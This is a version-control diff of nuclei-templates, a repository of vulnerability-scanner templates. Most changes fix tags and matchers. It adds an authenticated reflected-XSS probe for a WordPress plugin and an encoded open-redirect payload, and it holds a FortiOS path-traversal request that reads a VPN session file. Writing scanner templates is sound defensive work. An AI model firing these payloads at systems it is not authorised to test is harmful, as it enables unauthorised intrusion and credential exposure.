Merge branch 'master' into dashboard

.new-additions

@@ -15,8 +15,10 @@ exposed-panels/teamcity-login-panel.yaml
 misconfiguration/teamcity/teamcity-guest-login-enabled.yaml
 misconfiguration/teamcity/teamcity-registration-enabled.yaml
 misconfiguration/wp-registration-enabled.yaml
+technologies/intercom.yaml
 token-spray/api-digitalocean.yaml
 token-spray/api-segment.yaml
 vulnerabilities/other/royalevent/royalevent-management-xss.yaml
 vulnerabilities/other/royalevent/royalevent-stored-xss.yaml
+vulnerabilities/wordpress/new-user-approve-xss.yaml
 vulnerabilities/wordpress/sym404.yaml

.nuclei-ignore

@@ -3,6 +3,11 @@
 #
 # This is default list of tags and files to excluded from default nuclei scan.
 # More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion
+# 
+# ============ DO NOT EDIT ============
+# Automatically updated by nuclei on execution from nuclei-templates
+# User changes should be in nuclei config file
+# ============ DO NOT EDIT ============
 
 # tags is a list of tags to ignore execution for
 # unless asked for by the user.

cves/2005/CVE-2005-3344.yaml

@@ -12,13 +12,14 @@ info:
     - http://web.archive.org/web/20210206055804/https://www.securityfocus.com/bid/15337
   classification:
     cve-id: CVE-2005-3344
-  tags: horde,unauth
+  tags: cve,cve2005,horde,unauth
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/horde/admin/user.php"
       - "{{BaseURL}}/admin/user.php"
+
     headers:
       Content-Type: text/html
 
@@ -28,7 +29,6 @@ requests:
       - type: word
         words:
           - "<title>Horde :: User Administration</title>"
-        condition: and
 
       - type: status
         status:

cves/2008/CVE-2008-5587.yaml

@@ -14,7 +14,7 @@ info:
     cve-id: CVE-2008-5587
   metadata:
     shodan-query: http.title:"phpPgAdmin"
-  tags: cve2008,lfi,phppgadmin
+  tags: cve,cve2008,lfi,phppgadmin
 
 requests:
   - method: GET

cves/2009/CVE-2009-5020.yaml

@@ -14,7 +14,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2009-5020
     cwe-id: CWE-601
-  tags: cve,cve2020,redirect,awstats
+  tags: cve,cve2009,redirect,awstats
 
 requests:
   - method: GET

cves/2012/CVE-2012-4547.yaml

@@ -12,7 +12,7 @@ info:
     - http://openwall.com/lists/oss-security/2012/10/29/7
   classification:
     cve-id: CVE-2012-4547
-  tags: cve,cve2020,xss,awstats
+  tags: cve,cve2012,xss,awstats
 
 requests:
   - method: GET

cves/2014/CVE-2014-9614.yaml

@@ -14,7 +14,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2014-9614
     cwe-id: CWE-798
-  tags: cve,cve2021,netsweeper,default-login
+  tags: cve,cve2014,netsweeper,default-login
 
 requests:
   - raw:

cves/2016/CVE-2016-10924.yaml

@@ -16,7 +16,7 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2016-10924
     cwe-id: CWE-22
-  tags: cve,cve2021,wp-plugin,lfi,wordpress,ebook,wp
+  tags: cve,cve2016,wp-plugin,lfi,wordpress,ebook,wp
 
 requests:
   - method: GET

cves/2016/CVE-2016-1555.yaml

@@ -15,7 +15,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2016-1555
     cwe-id: CWE-77
-  tags: netgear,rce,oast,router
+  tags: cve,cve2016,netgear,rce,oast,router
 
 requests:
   - raw:

cves/2018/CVE-2018-13379.yaml

@@ -14,15 +14,19 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2018-13379
     cwe-id: CWE-22
-  tags: cve,cve2018,fortios,cisa
+  metadata:
+    verified: true
+    shodan-query: http.html:"/remote/login" "xxxxxxxx"
+  tags: cve,cve2018,fortios,cisa,lfi
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
-    matchers:
-      - type: word
-        words:
-          - "var fgt_lang"
 
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '^var fgt_lang ='
 # Enhanced by mp on 2022/05/12

cves/2019/CVE-2019-16931.yaml

@@ -18,7 +18,7 @@ info:
     cwe-id: CWE-79
   metadata:
     verified: "true"
-  tags: wp-plugin,wordpress,wp,xss,unauth
+  tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth
 
 requests:
   - raw:

cves/2020/CVE-2020-11529.yaml

@@ -15,7 +15,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2020-11529
     cwe-id: CWE-601
-  tags: cve,cve2019,redirect,grav,getgrav
+  tags: cve,cve2020,redirect,grav,getgrav
 
 requests:
   - method: GET

cves/2020/CVE-2020-20982.yaml

@@ -4,7 +4,7 @@ info:
   name: shadoweb wdja v1.5.1 - Cross-Site Scripting
   author: pikpikcu
   severity: critical
-  description: "shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php."
+  description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php.
   reference:
     - https://github.com/shadoweb/wdja/issues/1
     - https://nvd.nist.gov/vuln/detail/CVE-2020-20982
@@ -34,4 +34,8 @@ requests:
         words:
           - 'text/html'
 
+      - type: status
+        status:
+          - 200
+
 # Enhanced by mp on 2022/04/27

cves/2020/CVE-2020-26876.yaml

@@ -15,7 +15,7 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2020-26876
     cwe-id: CWE-306
-  tags: wordpress,plugin
+  tags: cve,cve2020,wordpress,wp-plugin,exposure
 
 requests:
   - method: GET
@@ -25,16 +25,16 @@ requests:
     matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - "rest_post_invalid_id"
           - "\"(guid|title|content|excerpt)\":{\"rendered\":"
         condition: or
-        part: body
 
       - type: word
+        part: header
         words:
           - "application/json"
-        part: header
 
       - type: status
         status:

cves/2021/CVE-2021-24358.yaml

@@ -1,4 +1,4 @@
-id: elementorpage-open-redirect
+id: CVE-2021-24358
 
 info:
   name: Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect
@@ -14,7 +14,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-24358
     cwe-id: CWE-601
-  tags: wordpress,redirect,wp-plugin,elementor,wp
+  tags: cve,cve2021,wordpress,redirect,wp-plugin,elementor,wp
 
 requests:
   - raw:

cves/2021/CVE-2021-25033.yaml

@@ -1,4 +1,4 @@
-id: noptin-open-redirect
+id: CVE-2021-25033
 
 info:
   name: Noptin < 1.6.5 - Open Redirect
@@ -14,7 +14,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-25033
     cwe-id: CWE-601
-  tags: wordpress,redirect,wp-plugin,noptin,wp
+  tags: cve,cve2021,wordpress,redirect,wp-plugin,noptin,wp
 
 requests:
   - method: GET

cves/2021/CVE-2021-25063.yaml

@@ -12,7 +12,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-25063
     cwe-id: CWE-79
-  tags: cve,cve2021wordpress,wp-plugin,xss,contactform,authenticated
+  tags: cve,cve2021,wordpress,wp-plugin,xss,contactform,authenticated
 
 requests:
   - raw:

cves/2021/CVE-2021-25120.yaml

@@ -14,7 +14,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-25120
     cwe-id: CWE-79
-  tags: wordpress,wp-plugin,xss,authenticated
+  tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated
 
 requests:
   - raw:

cves/2021/CVE-2021-3223.yaml

@@ -18,7 +18,7 @@ info:
     verified: true
     shodan-query: title:"Node-RED"
     fofa-query: title="Node-RED"
-  tags: cve,cve2020,node-red-dashboard,lfi
+  tags: cve,cve2021,node-red-dashboard,lfi
 
 requests:
   - method: GET

cves/2021/CVE-2021-42071.yaml

@@ -14,7 +14,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-42071
     cwe-id: CWE-78
-  tags: visualtools,rce,oast,injection
+  tags: cve,cve2021,visualtools,rce,oast,injection
 
 requests:
   - raw:

technologies/intercom.yaml

@@ -0,0 +1,20 @@
+id: intercom
+
+info:
+  name: Intercom widget detection
+  author: tess
+  severity: info
+  tags: intercom,tech
+  reference: https://www.intercom.com
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 3
+    matchers:
+      - type: word
+        words:
+          - 'intercom'

vulnerabilities/generic/open-redirect.yaml

@@ -39,6 +39,7 @@ requests:
         - '//\tinteract.sh/'
         - '//interact.sh/%2F..'
         - '//interact.sh//'
+        - '//%69%6e%74%65%72%61%63%74%2e%73%68'
         - '//interact.sh@//'
         - '//interact.sh\tinteract.sh/'
         - '//https://interact.sh@//'
@@ -119,4 +120,4 @@ requests:
           - 302
           - 307
           - 308
-        condition: or
+        condition: or

vulnerabilities/wordpress/new-user-approve-xss.yaml

@@ -0,0 +1,45 @@
+id: new-user-approve-xss
+
+info:
+  name: New User Approve < 2.4.1 - Reflected Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
+  reference:
+    - https://wpscan.com/vulnerability/17f99601-f5c9-4300-9b4a-6d75fa7ab94a
+    - https://wordpress.org/plugins/new-user-approve
+  metadata:
+    verified: true
+  tags: wp,wordpress,xss,authenticated,wp-plugin
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/index.php?a%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '?a"><script>alert(1)</script>&new-user-approve-settings'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

vulnerabilities/wordpress/sym404.yaml

@@ -5,6 +5,8 @@ info:
   author: pussycat0x
   severity: High
   description: Searches for sensitive directories present in the sym404.
+  reference:
+    - https://twitter.com/momika233/status/1540325055280070656
   metadata:
     verified: true
     google-dork: inurl:"/wp-includes/sym404/"